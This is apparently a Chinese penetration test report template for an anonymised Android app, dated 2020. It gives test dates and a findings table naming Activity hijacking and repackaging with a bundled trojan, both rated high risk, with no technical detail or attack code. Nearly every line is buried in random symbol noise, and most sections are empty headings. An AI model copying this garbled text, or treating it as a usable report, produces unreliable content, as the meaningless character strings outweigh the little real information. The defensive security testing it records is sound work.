2 I' ?8 i3 _0 @1 Z, L" w V! r! c9 [. V$ j2 M' U# l2 Q4 Q9 g
+ ]" Q$ S) S' e4 m3 q7 m( z, N" N
5 D/ v5 F! ^) X( V* }
" k8 k& v: }6 l* |4 U l; C
7 F' {+ [8 q5 ^" k. j: ]# l
+ a! Q8 I& d+ h7 D* J! b" K+ A1 H* L9 ?9 b; x5 X6 t
9 i2 H7 x' V2 m; H6 w; H% m' \ X8 y( L+ i/ O
/ j8 ]: ~/ n K8 y
' H# O5 n" M, a( ^ 文档编号:
j1 R3 Q6 B b* s
5 x! n$ y8 f9 B5 t+ r
* V4 y- ?* n2 D# R' @
8 p6 c$ u1 E0 b% o1 J+ s( q9 y9 ~
( F- S6 \) K+ A: W
" t: c, ~! T" x: D- H/ R
+ H- q! K! W- B2 {+ c x4 I! q& c7 U4 s5 b6 N/ c" X# [/ g
5 s5 V2 a# B& m: M2 K. d _( H
; _: t2 ?9 @% w" D 8 h9 t* Q* Z+ d5 H3 Z/ R1 o
" G/ {4 q8 U- }/ {
/ `! T6 T7 L! ~2 i E
5 u" g# z/ D+ `( K: n
( z, ?1 Z4 b: S$ g, o, V. _
7 m: i: r' @% R4 F6 o) I5 o
: V1 c g3 M o
' y I: e' P9 r) s4 A 7 Q/ v8 b$ x y- c6 Y/ n) d& E7 K
1 X! e: b& ]0 S; r- e
4 h4 w) m% |, e" ]" k
9 g4 E$ h9 j+ V3 }3 L2 Z( K v6 S o
- S3 h. |5 e6 x- V3 B2 O
+ k# Q3 k& _5 z% u+ S! W& g! o
% m4 s; A! A$ b
0 y* }2 v- Y( n5 @
9 z0 F N) }) n- P) D- L
3 t4 w; C2 ~/ U
, d% ?/ Z- h, R; d
8 M# e% D" m) R% q- d4 t
2 x1 V$ J+ n# \+ ]
7 q8 p% W- {" W" `
4 N2 d. Q$ Z1 Q( X4 ? E- H7 D
7 p$ m5 K& p2 x( }2 r0 n; V * t# x" K* A, D$ C, i4 Q
5 h( ^4 X Q! d: O" l0 O$ ~- j 某某某APP渗透测试 , s) B( i8 j6 J# O
8 l- _0 V8 f0 Y: k' i5 D" k9 E
V- d4 G# |( } f9 V. ?' M, F! Z+ e( I
8 A' K* ]6 G1 D; E& [; r0 @$ K8 s
6 g, E1 j5 A. |/ ?! u 3 g+ \3 J/ Y9 W4 t C* u
+ @3 l. _( E7 d( ]9 e# Z4 W, U
( E+ l+ H: l9 G2 h9 G
5 z! C/ U+ y" j% L: g% g+ d
' E) H! G5 h3 \1 ~
) w- A$ P# C' K , u! G- G$ g% h' x
8 v# k& s8 c5 \6 r
b- H" K2 e: E: K+ h
) M' D: k2 @' H$ F/ v
" T% U/ ]+ B, J( I
, T" C, A/ E- S, ^
0 |- `. T$ x x$ q6 w" v; v+ |# P S# y
t+ L, p" @: |/ L
. C! U% O4 t5 g$ b
" g$ i! |- e; K$ w% @, _7 w6 O
\& e2 h# L: U4 o" N& f% h( U1 Z
9 \ n. E3 E3 J, f* i/ a3 M, ]
0 V1 P/ z+ j- f* f8 ~
+ I1 ?/ g' c) w
9 t8 o" p& c7 M3 Z& ]
~$ b. D7 Y6 {; V+ Z% I) z. M W% Q" V' E# e# j4 t7 H! q
技 术 报 告 4 h# G+ I" h' ] ^" w' A& k
1 F# ?6 q1 X5 o. k" D# A7 |
: k4 ^, I/ n7 O0 ]3 F: B. [. { _: ]4 o2 {5 t9 t
: E" t& n5 Y* O
1 i) y9 d U8 b/ A8 ^5 t) H 9 N7 s% T8 ^; _! f. D+ \! y0 Y
5 K( F2 o9 j9 J
- Q. Q$ r7 u4 [& w
! J, J$ q9 Q7 ~. I7 o6 C* Y 3 R) W8 @' I0 q) M1 H% i$ p
3 D$ _. P. k' c3 X c 0 e- C' j/ b% L$ j
% ]' v' A+ Y/ V: |9 G
J9 I9 d- a5 @- J# W; ?% c H0 a
. p$ Y% V# K% Z a
6 E) D) r/ }; y. y8 N( B+ R7 ^! Y5 q" [) N
$ E) z# p- `! [$ c
/ m1 B7 h1 z0 u8 Q7 x! O
0 w- m; m4 i/ j/ H" I4 J1 n( N+ b4 R3 n% P
- D# H |5 Z$ W# ~2 N6 {: ?: ]# A- q, x% `3 Y4 q9 @1 d! {3 Y
5 g1 l- q7 T1 S$ d- o
+ u6 k% {8 z/ j8 l w9 Y/ |$ |
, X% i% x+ R, a, ^1 f
m& H4 [& Q4 F# J6 ?' P
" s# L# S* w: V* s9 t
/ M1 E7 Y6 X6 z) |* k6 @1 N7 |6 @. \
; U4 ?, t& K% x! z/ @/ G6 H7 m5 x6 f# ]
6 a& X& N8 x9 Q- q2 @ Y! i3 ~* s& G. c0 K/ P' @
* } [! [+ n1 {/ J( i/ o
: H/ i( ^, I+ a+ S) a1 P4 f
+ h# M8 b$ ?8 M- r0 R3 W; K2 z9 O b5 c) O5 y
8 H, {. b6 Y0 z: z/ [) I8 X. u# d, W; T; n" B. p
$ @" ~. J5 R" Z6 [/ y( l$ A* c
$ |& o# |7 _% k% c! ~ 2 {* ?* x+ P: G& y
- d; r. S/ j8 \1 m7 K
7 Z! w! c. `/ p8 |" u- g; b. w# u. B/ |- {
% }- i8 \+ O% K. d
/ X. Y( U( C# ]$ x2 h) }3 J$ B' a; \
% M2 q+ s! C2 m( u% F
; V. K( |! G" W# G% o+ i
8 O5 c( y( i3 u$ g. z6 a
; _# Z _1 j6 f
, O( L1 S( S8 a5 ^& T6 H
2 [0 g' u% u! A: a3 I/ ]: G- I
* s0 t( z s* g% y `8 U% e( I* M$ L. n' {/ ~
! J+ X! z1 M4 X. w- O
$ V w3 F1 z2 N9 J" N
; _- }6 T5 x9 C" n7 a* ~' E" ~2 v, r! `
" p2 Q' W& f* m: s
Q3 r6 U5 U* Y. f* ?8 M4 n3 t
5 }8 u5 l7 \/ o8 O+ ~7 a# o) s* C/ Z
- j* C z8 J8 |/ B1 B M
1 v1 R6 A3 z1 n1 q+ h% M( p8 K+ Y0 M
" s. \ n" s. E- |( m3 V+ J2 R4 t- N5 w
( J% `6 E8 `4 |- C
; b9 e% ?4 r/ n' ^- h- s" Q: l
$ g/ u7 L% K( T9 Q8 O n6 E% W , F1 w( Z' I% l1 @3 V! b
% U# \8 K+ o( b( S+ R
2 A* h3 A1 ^6 {+ |3 Q0 V0 e( v& a' W. d
* T+ ~1 e/ i% ?/ K' |* |
% x; F3 i5 E k( P$ A0 g) y$ r8 Y % c" w/ ^* \* I, G
$ u/ {4 H6 W3 i) u% E4 r$ C. [& w
1 `' O' F4 o2 Q- P0 x7 \6 m
- ]: v L, D D5 N* f3 E% |& |
0 N' u Q" H: C% ~2 j2 Z
; e) B# Z2 B. b3 h8 G3 u
0 `: Q: o: d+ Q( j* [& ]/ V, v# x7 p* l1 E( e
4 ~2 i- i& i- [- `7 y
1 x5 [2 p! a6 a+ [. q/ Z+ G
3 }: S6 k- ]3 ~ W9 V3 D- O/ g
8 D! B- u h5 P* P8 t 4 Z& P: \6 ~% _/ r7 b
4 ]$ ]4 g$ v, z- a$ L; N
a- o6 g) ]8 w1 U
; q, p" H/ E! s% v: a' `6 b
; o7 h& b" V0 K, ]
6 K+ ?! A- b1 F- x ' k2 f& K8 R( w- ~2 C# o
, Y5 k1 n" Y4 T1 z7 Q" E 2 c7 e+ \# g6 d- Z% a7 O
' s: x* \: t; T1 }! U
8 u) p9 O B3 g1 Q4 U2 z: m- l5 q4 c( P4 A
: \2 K9 L5 Y' p$ x# }( B
( \$ i; h* O- L; x2 Z
& G* Z* U' S+ ^8 J8 h8 {5 [. F3 H6 Y) U+ o$ O9 m2 A" y1 H
' Q! Q9 G: Y' K: Y
5 U/ Z/ I3 T# Q2 g4 \& _
- z* w" B& I7 Q3 B) d9 h6 q
1 l8 m$ b. J1 b
0 M7 ]% ?8 r; y0 [3 G
N2 `5 R' }4 M" V( }
" q+ P: Q+ I. ]! k$ d
% x1 y e4 j# @& P- c" ~/ M8 L7 {! y) v
* a. g9 ^' J1 a+ L) F/ s: m. s/ @2 {5 D7 R" ]" M' V Y# {
二〇二〇年 7 P0 a: T0 s, ]5 Z5 F- P
( ^# u1 C$ V4 r `: r! @
5 c- p' x H k! s
, ^# p2 ^! k, z6 C , w& q4 N8 F7 H# [. |
$ m; z8 H$ i% l1 Z: p& [, z+ ^
' R$ c# O+ Z7 m9 B# M/ z5 s$ X$ D
, O, M1 S1 F) v! i. _+ N
2 B! d9 b6 J, a, s$ V; ?0 Z! g% W/ E! R& `( Y
- G2 g& H) U- r# V+ ?3 B% L8 K1 k
6 M* X" t, a0 F& i! ^! a' P
: P7 m0 o! p! A5 z( @' O
& @6 U2 z# {' Z$ J1 t, s
6 a) v& K1 m6 S( o4 ?' q4 H
! n; m3 W) G- U2 O& M1 v+ E! X
8 k( \/ y0 Z3 \, Q1 x( A6 T& h7 C) |4 u6 \
8 h) ^: G8 X% Z1 K/ V# X, [. l+ @# Q+ z( y
9 X, }' J: ~ V7 ~! x9 {7 w# Z) E, ?. r e1 S$ ^1 [
目 录 : o$ O. ]; {' q R. X
: l0 ^7 I' Y. s4 Y& U3 v' W! ^$ E
& h4 a5 |0 g5 f E z1 g
) ~2 _0 L) B8 [* `' W4 ` M
. H/ ?5 K, I* A2 \( a
?2 U& S$ l, v- T( v
+ U* ]$ z( x* B# c7 R( n; ?. j# F8 P+ a( |+ v
/ \7 \9 Q! n% H+ {, d
6 p0 w% C* N+ {
! ] u/ K0 D$ p# F2 ^. e9 P$ [
- k. E2 q0 {+ D \; p! j " ?" _9 ^" P1 M- g! T
& v$ ~2 K( T X: ?( h 1 概述... 3 2 ?& W, a6 d& B3 q( u
* ]/ N5 n \3 \4 j
6 D- T: O# o1 R" L: E
( }' M7 f& \" f: P6 |; d+ @$ n/ A7 ?
* y+ v! D* ]! |1 a* n
5 U8 k/ A/ {+ k& n 1.2测试时间... 3 % V. ~) l* L8 N3 U
I( {) v! D' U" x) h
& x8 {5 M8 ]: \/ a: Q" J
9 s6 [. K; U7 V+ f5 y ?
3 n) D; t, G7 V/ p5 A' l' |: B
& i2 r5 }$ N8 w( e j1 ? 1.3测试对象... 3 : {/ c% H5 n# T! U
. v5 Z3 k; }, K
. D/ m! c8 H$ P' X7 X+ u% k/ B
: G+ v6 y2 S2 d2 Q
" \* I- i& G; P
/ v- L3 b6 T0 R! f 1.4测试结果... 3
* d2 k; z0 f8 {
& K b* w! W& q
- X8 i$ I' l! h5 o5 [7 C' d# _$ R w& e2 x2 j- u. g
- j1 t) x! y5 G3 W
% d8 ]# T* C( U3 r. G0 ]9 u, N
2 检测结果... 4
! E6 r- [" o b5 p! I; ~7 f* _+ U7 m# z( W# T
4 B0 F1 J/ k+ d& L" p0 }
* H5 K1 S4 Q5 d$ \( d1 Q! V, c
9 G' ]& T9 T* K8 ~3 ~* ^
1 f8 e- }$ Q9 x( U, b 2.1 某某某... 4
3 y# @6 F+ V! R/ j( c2 i5 m: ]4 N1 T) s* I% I+ q# z" `
, t H+ V$ B) ~6 \9 P' {
1 [& B9 w; G! J$ _# \. U
3 \3 N# l9 k; h. a# h" J/ E. L$ K# d7 p* \. o5 B; b
2.1.1检测目标... 4 5 u8 {% @$ o& [6 y t) |
% n! E% p; V8 i
, I5 m! Y. Z& R/ W
3 }7 W" N0 d# B7 S" \) A) D
# }. n; `' i) b4 A* p5 z9 j0 j
* z3 h; r2 w4 o0 T5 M
2.1.2检测结果... 4
$ V' d( ~+ ?3 D: P
o( x) }, x0 A
/ [! p* Y& B% h4 F* V1 e) ^
& j: z, N( I( X# f / a% i! q/ ]: m# N# x+ q
7 j; Q( R, I& d$ B 2.1.2.1. 4
5 s9 V* v/ d2 k$ }$ i$ J0 g3 A1 X/ e! z/ ~: m; @& p3 e9 F1 h3 s
: a$ H6 t% R' r6 B
) z y" Z* x% O 7 ?( ?, B$ N( \, X/ ~2 m! g2 E
8 }, r9 {" Q8 O 2.1.2.2. 6
8 t9 ]# R6 [5 G; } I
7 {5 O1 V9 v1 b- B: f+ v0 T
/ e, s B/ u& }* |3 ^+ ~* U
, i: a! o5 u/ W+ B
/ c2 d3 s" a6 e
0 Z2 B5 ^/ \3 c J
. o6 ^; ^; D9 p/ X- ?- T. C/ V7 _ m7 v$ N$ y2 y
6 n6 M2 j; q' o8 M2 c% `) K* E% x6 b. N/ k9 H" n5 k
" E0 t: z% V+ Y7 Y
: L0 X$ i" T7 F; M, K. O3 U
- L: p9 {+ P/ d2 ]
( C. E$ c5 y o h- G
0 J: `, |% b5 f; d" A* C; G) c# G; s4 K3 W Q
) B6 g0 Y9 X. \* c0 p, Y/ N6 w0 T8 M' E
5 N8 X' Y' X) h8 T: T6 w& Y
5 w4 g8 \; s7 G7 m( O! Y( m$ a
1 概述
, r+ F* M9 F& K8 X3 ~; Q. b$ g5 Z d1 D' G6 k* L% i
. X1 X% X) {6 \# V: h
2 A0 V6 e5 r- ~. y- E( Z' Q0 u
( j8 F0 d( Y& c& Q% H, `& O/ t$ } E9 ]# a0 C: v" g; C: }) |/ D d
1.2测试时间 $ ]' x0 o B$ L9 z/ F! d' K+ f
7 S% v C3 r" e2 f: e* V$ q$ U
6 ]* L9 @* q" n7 j" ]
7 _- _0 \. X7 E' V6 T5 B8 p/ [ 6 S- I) Z9 [/ d
+ @+ J3 o' l1 p6 Q9 Z / L* k1 y* K- _8 e! g
. T4 o+ O& V' ^
1 q( W! {' t* l. t
5 G; E7 s6 `0 B/ j- f |
- _2 b7 |2 l9 ]1 J' V& W: P1 n# o1 u0 d- ? Z
* o2 J6 L. F) m) e8 k
; L6 H n( @ P$ m( r 渗透测试时间
) B: y# t! ]/ X4 u; C+ E
9 Z$ m% Q% b/ o6 S3 j ) e3 Z* P" y1 D
% X9 }; M( h9 b4 h& W1 P
|
5 q/ p7 d1 C8 n1 R Q, C& d* T5 c, W5 o1 r; i) f, M8 i
, v. k8 ~& c7 Z# |$ o) I$ b! e2 c J$ S
' m( }* ^/ P5 V" s# D. G
7 r5 b2 R8 m/ R% s) C | 1 {# d5 {. }- g
: D$ [$ g) T8 e" F# Q9 r
% P9 Q6 k+ @* j0 H6 e
7 U( p% M' t2 R# W- {4 w
起始时间
$ J. q9 g, o3 A9 I( u( Y2 w1 T/ v( ~# Y1 C
0 F: O i- D( p; D) m( p# J: P; C1 ?1 u3 r; S Z9 B" B
| 6 c6 H- S, [0 W2 D$ f' F
+ [, S ]( C. \! [8 j: N
7 o& x1 [: t' ?: k
- j( p% z1 `- s$ j ) }/ {5 z6 k4 b. {' _+ ^1 s
0 p2 r+ I3 M" K! F' _7 y 2020年4月6日
3 e3 f7 o9 Y5 V/ ~5 Q$ N' M/ d3 ?# }6 A2 t
. W% d& p; k, b& P/ p' S& c
/ U: a& C& K& u) g# s3 A! T
|
2 c5 w' d8 e5 _
* f" X/ |+ x* f8 }9 U
D4 P# H3 v2 D7 ?! f( P4 C' u. ]# |( E1 S
8 S1 v5 C6 ?" M; s$ d/ \4 ]7 O" W" e' |
| % b& A7 D: b2 }* Q2 q k7 q
6 l7 s2 `) q; F. a* _- |1 Z3 \
1 R; K. c7 k# o3 w4 z9 d4 Y3 T
4 _4 v6 m# k" h$ m3 p+ L% m 结束时间
" d+ k: |( g% f6 C" f3 ` |( o& l2 |
6 n" Y S5 u( ?+ H+ Y; Y2 F4 i
0 n8 O+ O) E+ ~; ^; p/ ~ r% D |
1 s% W3 E5 _% b) G$ s$ c" T" k; M3 `9 _' V2 @% z
9 h# M: `; L- ~2 t1 x
/ A& J- J+ B" M9 S 8 J) p: v# O5 I7 @0 c2 L
/ @, j) v6 d2 T% s/ }# D5 @
2020年4月9日 3 n% ]4 {* K$ L0 ?4 K# g
! H1 @+ o$ v# }" }6 X ^
& J: _; \: Y! i' ?( L: I0 Z8 g8 a# _, P9 B* f7 k1 f3 k+ i" F
|
/ V) w, [% O5 S- f8 B$ C
* L& P" j6 K, O8 f
, \4 A, `) W* |* J+ f
7 C! B# V" g' B6 N
/ k3 M6 \) T* N9 W7 h0 b# W
/ c- g- ?2 J& S4 Q% i2 z& V
; u: j' w" b4 `; x
/ k6 P. F; R3 C* `* X( y2 J 8 S- Y! x$ c. z& s3 w) k F
# K; z4 m( C* }, F/ ^- t 1.3测试对象
2 v; r. w0 ~; ]+ Z# a/ t6 H2 K) ^
) S) P, f" b: a1 {
8 \& T4 B% t% {! r% G0 z* c& ^; q3 X( P- |
6 u ?$ O9 Q5 z; _2 u0 X4 S5 \
2 K/ k1 }9 `0 ?0 s6 r 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
0 K( d2 Q3 j8 H% B* m0 G6 S7 W; `: ^" z* y$ k: o% Z2 c
/ {; @2 f7 k+ L# t) W/ n( a# M6 {
3 e5 E |5 r2 T0 F1 s4 A. L- _) x0 j3 ^+ f% p' c
表1-1 检测对象 , B; a5 u; [2 g" V
) k ^8 i& S5 p4 d- s1 J
7 e7 @( R% w$ r8 L d
& g$ c3 s9 P/ Q( R3 b
5 Y" z$ C+ F2 \6 L) C( _
8 J7 d3 x2 F/ P( a
( o/ y0 i0 C# H" z
+ P) D# M% g$ k) h7 z5 P |, s, @
2 f& [ D9 s7 H" H* t/ u
) X+ }, q9 u5 V/ l+ g, F |
9 ^# B& ?( M% |. T1 m: P: \+ p4 U! _. {
9 S, U4 w( u: q0 {: `* l 7 R5 C2 T3 ]4 m# [2 G
+ _: P* V$ b" z; N+ F6 u4 i( P4 G
序号
: J: n0 O% |+ n% F6 I) N4 o1 a M+ ~+ X% }
0 b3 `. J! D1 x2 t
* l/ j2 e, L2 w) ?/ \5 |
|
! _' Z& a& ^3 V/ I- E& F! ^ I1 C+ b
+ w1 e' N$ n) J& B' e
1 ~( L. y, ~! E4 I* \
- z7 @: t [) u: c/ f* W
* ]; ^* D- X/ d 测试对象
% |% m6 \; D# ], x3 A! \6 C% D
+ i4 R8 Z, t7 Q& J7 `
7 n: N9 y0 m( C" [$ |: e
* B1 x' x* n7 W8 C0 p | , ^- e* H; }5 i9 B; J9 t' ^/ Y0 \
. \6 P, M; |+ c$ ]( p& x* N
! U6 z3 i4 [/ R0 b
8 b6 k {5 _( \) S0 I9 j. t' z 6 v. u1 Q2 ~$ L; s1 W. k
, R* e8 B& F, ^/ x: n- H" u
测试地址
, A' u. `* r. K% C$ b+ C4 `; V& i
0 ?9 u/ E8 {- {7 Y0 |# l4 @0 {( G1 _* w* y5 F! [; G6 E& O3 I
|
( D5 W5 n# M5 Q0 o+ N* R7 z2 z& L/ C n0 Q2 _1 n4 d9 h1 R
; q9 S- o* |# I
/ u# T8 L7 Q* {6 s$ \/ C6 V5 s
% W ^/ f) K m8 N, g6 {! F
" X! z) Q9 E/ d) K7 B/ z 安全漏洞
( ^/ J2 _ w6 y" h: s: h9 U8 ]# r! l# e6 h# Y1 h
2 [: O A; o' C' W- ]: v$ q, Y
. Q! [& f u/ Z: W- R | % h6 r# V. I6 o! Q
0 w$ u: a1 D( `! f
+ ^" g# @; m; `7 _* D
R* o& Z8 P! `3 o$ ^5 c
$ k: v; |5 E2 c: t. A
# p) a, A% b& U4 c% `' w- t+ M |
5 W0 z' B3 Q$ s6 S" [4 \6 s$ w# ^ Q3 C4 I8 _- V* u
# `' u' r8 Y# ?) g, E; o: C
" U; K. v1 c2 C# ` 1 ! L9 x- M" y7 M% ~
! z" U- ?9 D+ ~" Y6 t2 P
0 f, f; K# ^9 [* @4 F- B" J4 z& J% I$ ?3 x$ p0 S- W- Y
|
/ \" ~% M$ I% B$ u$ F& B# T6 D( i
5 P6 f* w! u6 [
" `9 g) U' m$ a9 Q4 ^! i
9 T3 k4 F; \6 g# n9 S8 G+ X8 W' S2 o- V. ~6 D6 \5 P
某某某安卓APP 3 X. d* z% f: i% n! }
: B2 }( @& Y8 d! ]0 J3 d8 o
W1 A; U8 k' ?* D) C6 m3 W- |
# y! \/ T7 _6 ^' H |
- H, T* V0 B2 Z! _ @, E) k: O. j, s. _, b% Q) M
- B9 t" E- D7 u5 @& p
1 X( _: V$ R4 D% e& I9 P+ N: s5 o/ u) E ( s0 O I/ `2 Q. a: B- C
. u. g, ^9 F& t! l& Q# a4 h; @
: ^% E- C9 L a2 p# A
?6 P W' C y4 ?, X, X/ j
: [$ @' J* ~9 L5 a
3 \* W3 S I) M5 O | 6 S# e) o- s' Y1 [6 f7 W/ Y
8 M! e3 ]1 S6 I7 t ; Q% j# V* b: v1 A
6 Q4 B2 k- O9 }. q; h2 }1 e* U
& \, ]1 m6 v6 J! @0 W
2 U" B. c9 T7 O, k 2 _' Q/ V4 j- N
9 M8 H" @1 E7 {0 Z! D , q" ^; ^7 [3 D6 } f
" S7 `& J3 [4 n9 z, o
|
- h7 b( c9 A3 |5 n" o0 G
& m- r9 w* l( Q' ^, a! c5 U
3 W" ~% w$ U4 |& k- ^8 L5 s* t) V
2 k0 k. b, E" ?1 `
, @0 D, v- w. F4 L U
7 }& P9 K {) S+ Y9 L9 e
& `& H2 w" S; U N3 W
! z% z0 X2 ?, O' \: L8 N
* Q3 N5 X# v2 Z8 B
5 Y& m' t4 X7 n- e M+ F1 S& \/ ?* K- C 1.4测试结果 ! _& {, }4 U3 N8 z q8 X
6 p* n5 Y! g9 F$ y3 r2 R9 s4 i
) W4 Y4 x) x0 F2 S5 G" K
$ {! Z: p4 ]2 p0 i
& |2 n8 e! m2 w- r8 Q7 K# ] ?' R. p" R7 z2 ]# M0 m1 }
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
9 F8 N+ @, v0 ?/ T2 u* i4 F6 K+ J7 o7 K# k/ f
8 v4 V6 @5 |% g: A2 |! @# y! l
1 k) c& S1 v' M& H& C0 H$ ]5 D X3 H
+ t: Y& i% M; }: P* ?; L
5 t) ]9 A! D* ^- h3 M
/ W# X6 g/ f% M/ @2 ^
( ^% r( z4 Q# l; K. c5 w
! I- K5 w q; P2 ~7 ?& d! e
2 m# a( Z+ p- Q+ y8 r% M9 f
- p% w/ f$ i$ C# T% q ~% W/ u6 Q6 r5 a# c* l/ J4 T8 P
7 P4 A$ p# ^; T
] ~- Y/ `2 c2 ^9 b5 H
' p% V2 v) d1 c8 r7 j
; {0 W4 x$ _5 u" f; ^# q ; \8 m/ M9 ?# V( s* S: z3 ]1 X' m
0 d9 D U9 o! B7 @ |
# t. W% k, L2 Y8 b: g" ?* B
* d. m; z2 S' _- K0 L- e % \1 {" V, f5 p3 w7 J) y1 G
- l1 U4 i2 |% Z* R7 c 序号
) M6 |( @8 h' f1 y$ k. G+ e
, y, G3 @& l @ N: d 9 v4 o7 ^3 U7 P
, p: @* z8 Y7 ~ d |
& f/ B, n" G$ w$ W+ N7 `5 P' {9 _5 i4 [5 v- k2 @' Q" P3 H1 o$ q
7 H' N C6 l+ u! U+ X7 J" y# b0 P) v
4 d8 L) l! Z' X" o
( \7 x. H+ G1 i
) G p" X6 a t 系统名称
# k K- }/ J4 [* |& {/ M3 p9 g# L% ~' w! t
; y; q, q! Q: Z- _$ {/ x5 T! F9 W* n$ }1 |" X
|
7 Q0 k& R8 ]: O/ Q" G/ J# {; P, J% }& j* |7 t6 K9 i
6 L& X& w/ s! P! C0 f1 ^
3 M' ?$ k) A* i' p* t! V ' |# u$ w+ [$ L' P4 J9 l9 q% v
O( d% j) n) A
漏洞名称
% T2 [3 U. B8 Y, J, [1 z+ V8 l/ G) q3 W; E3 {! r3 O
' C, a3 w6 x5 r+ c4 i& e* T* h$ Q% E- @! w
| 2 E8 s) ]4 q! w" {& Y* ~
. u$ {! ~9 E; \ q * C' a; ^+ G( R5 [/ {
: ^$ P3 ~ @1 m2 I% T+ o ) C; M, v: w/ A+ \
' ?: F5 W g( A* c' e' q# @0 w( Z
漏洞危害
6 P: x- y7 D/ k; }, Y4 W' ~# j
, L" \+ z) Q: C \2 w* H2 j 1 ^5 w5 z& c! f5 j
6 `2 R+ U6 r! Y; p6 }
| ( Y1 f+ ~, |6 {( d
4 k- {4 q9 k+ W4 p
0 c; B- Y9 K' B+ k/ Y
4 l4 Z3 h$ T* g! M
1 _$ j& x! C* |! @/ Q1 Y
2 C: E9 o U. K. J0 S, i) h& P 修复结果
" L+ b5 N, a# P: X. |1 l/ T
# N6 K8 x9 y1 Z3 D$ W
, }! P* b" }1 d2 e4 p, {1 w; I2 |
) V( S9 t* k i1 W- @3 z ? | 8 J& t, G/ A r; U/ j9 ~
! p4 [+ Z6 `4 X. W9 p
% Y# W3 U# [% K4 n+ Y) l0 X. x4 O/ K( Z7 b3 A& [; W/ w3 H3 l
$ k) g( O8 T4 \& N. M
$ j& E: ?4 L6 r/ U q' k# H |
+ A1 ^5 R4 l) X- n* C4 o0 c& f- ~6 z
' k4 y0 R/ n& U. S/ V& g8 }% n2 {3 K
1 ! z2 k( a3 o9 S! }; k% U3 F
! t$ Q( c( R4 w& }( w , c6 w1 h" M4 @8 x `
+ d2 }' ?5 Y" y | ' W9 y0 {8 p2 |8 r2 |& ?
& s0 V$ F: K+ y! `
; s+ V0 k% k; k- e$ U2 d
3 u6 r+ \, U" P+ `& Q" Z1 G
9 z; ]6 P' f( F' V2 G: `
% I$ f" {- t( b! d 某某某某某某APP ; J9 ?2 H. r8 k8 Q0 q& y. e
2 G- `9 O x; O, M9 R 9 d- r" s; K: L! v2 x* J9 o
6 h, { n+ J$ C& t1 b
| , Q4 ~( Z: H' O7 L: B8 }8 o3 m
0 I- A9 ~! _" w" W/ r ) A6 F5 N! x+ c& _- n% m
' D7 b, m2 D! C& x2 B
# t- x) j3 @$ o- y0 z* I
S/ ?0 _/ i( ` Activity 劫持 * G' C/ o* h" G; E- d3 s
# J7 [9 K7 `8 `! d1 X
- ]9 J* U5 M) s8 j/ R0 ]- ]
/ y5 {- f$ u( y, y( T* |& L0 K
, R4 \. X9 N, [) R7 ?; Z$ M8 a& e0 |4 e
1 A2 E# X8 w1 I6 j
" d3 h0 q* G4 f/ d" I- B
z; g3 ]/ U2 l+ m7 g
1 |: D( q) r7 V+ t2 T
| ! V) d: I, q$ A9 { C9 [4 b
' d9 p5 E! d7 q/ H0 c( i5 u1 q
# J6 H4 u+ h! C; N& j
) \( o t: g+ A2 Z* r% z
0 j0 Q9 T5 j+ @
, v% X+ f4 i. c; ] 高 9 p" X* f- d r' W
& ?; Z) C3 Z9 a) X. T7 l* [/ Z' {
+ r. m8 \/ \# `" I- ]
6 o# [$ \2 _, ]# u. M5 t6 ] |
3 r# Z, I7 y2 w0 i5 l' R1 o0 @: j+ c% g& ]; @
1 F; t( g) ]5 E
' }: M0 N, ^ U* T3 r8 F$ M& U
b0 B1 P$ ]: u6 p5 F8 z
! {! \$ v+ i' A7 H1 Q; w 1 ^: G( n" K( B B2 l5 | ]9 S7 y+ u
+ y- j: Y' L5 o" D' S
; v# X7 r4 T1 @) }
' r+ T7 X$ n* b( B& |4 v | . R5 E5 g D. G& x2 K: K
6 d2 C4 x& `) \# _5 c
8 y* j, W) I: J4 d* D4 Q+ m0 u! V3 s# t4 n! o, `$ Q
( ~/ r2 ?/ Y9 o+ o
6 E; z! w; N" S1 W | , w- Y+ S# ?8 W! G' e$ c0 R0 z
- b1 w1 R2 I" m. a / A8 F0 D- e1 S$ @! s- F
1 h R. g+ R$ g6 D3 J# V( ?
2 h6 ^& p, u! q! e
# W0 Q% X( {! T" V; }% _% k # q, V2 O% Y1 M4 B1 ?
: ?: O4 L9 h% Y! g- l% o Z- E
|
# J* z4 T' q7 D7 N4 t. ^" r$ G: L" b1 Y* e
- Q1 t7 q( e* ^+ g
7 W8 N& u# b! ~
x% u" j) J: T+ d I4 R- u) y, j0 [' D$ [# f; S, E
某某某某某某APP
6 l% a A7 n8 P/ V' a, D# T9 B
' _: }! ^- h; t m # M$ ~% D7 l! m! E: t
/ m% t2 h8 _! V* G' J9 V | % Z4 _ v, N/ [! K% M+ X) E
- V4 ?1 z3 m: b( g, x, ^+ p- d
8 A/ e3 Y e) P" I, A6 z' C- q
- c+ W4 A" X; I# c- e g' b( ` # ?& I/ q h2 d& L
+ b6 m4 D) ^7 R; V 反编译二次打包捆绑木马、篡改APP代码
8 I0 c" H- ^+ w6 c& y+ ]: w8 s4 E
& r9 H& {1 v3 l' u9 ^1 s# q4 y0 D9 \/ O6 Z
|
% q6 ?0 T& [" x" Y/ H. ~
; g, t" e8 g1 A+ L$ H/ d1 k& p# k
% k5 V/ Q( h( a# M9 g. h' v) I$ _ F1 r' n) [) E9 L
7 I1 k; I! X2 C. z, r" h; @. o! h: s
高
: {) a0 w8 ]2 {1 ?& T6 r0 Y; ^* c
7 O9 B. [, n" v* k2 ^6 |; M' `
- `9 w; x# X9 }- s5 ]8 ~% w4 t8 g) j# x
|
" P8 | e9 f! |. L) S* G
9 C/ k$ J# H& Q' {
/ O" C0 I4 n# m; K' D- G# O) r6 O) Z8 U% \# W1 U8 H" {
! ~3 Q k4 F9 n$ n' i# I6 S9 O9 Y: l' G" i& C
1 W; \' `* r- u
5 G, k( u0 D6 v @: I
, q+ H, G0 N& Q# a0 H* p4 l2 t% I( C: F1 F! x
| * G) j ]) d( S8 L: U! L& b6 ]
* E, D$ i; j& \: J$ d: `
9 {$ x- y# D% z: S- |( g
9 [: ]) N1 P+ j3 b" Z5 _% L
7 z+ K( _0 f: i3 o( B' X
/ _1 g5 S8 y* u
9 @- R) p+ r) u3 B7 z3 F/ s
& h4 O' e( k3 Z9 a( }* `$ a# v
# I3 ^2 s+ w, m# i( W$ g& P! D3 _. `, Q
9 c# {% ?+ G1 r7 M9 M! p- i+ ], R" \% \( V5 m! ~
4 }' V. x1 j1 V8 V: D. r
: |4 O6 \+ q- X# J- X: z" W& D
1 }$ }9 U8 e$ q* I# v0 m
0 {: a3 ^& j& }: S5 ^5 C. p9 Y) L
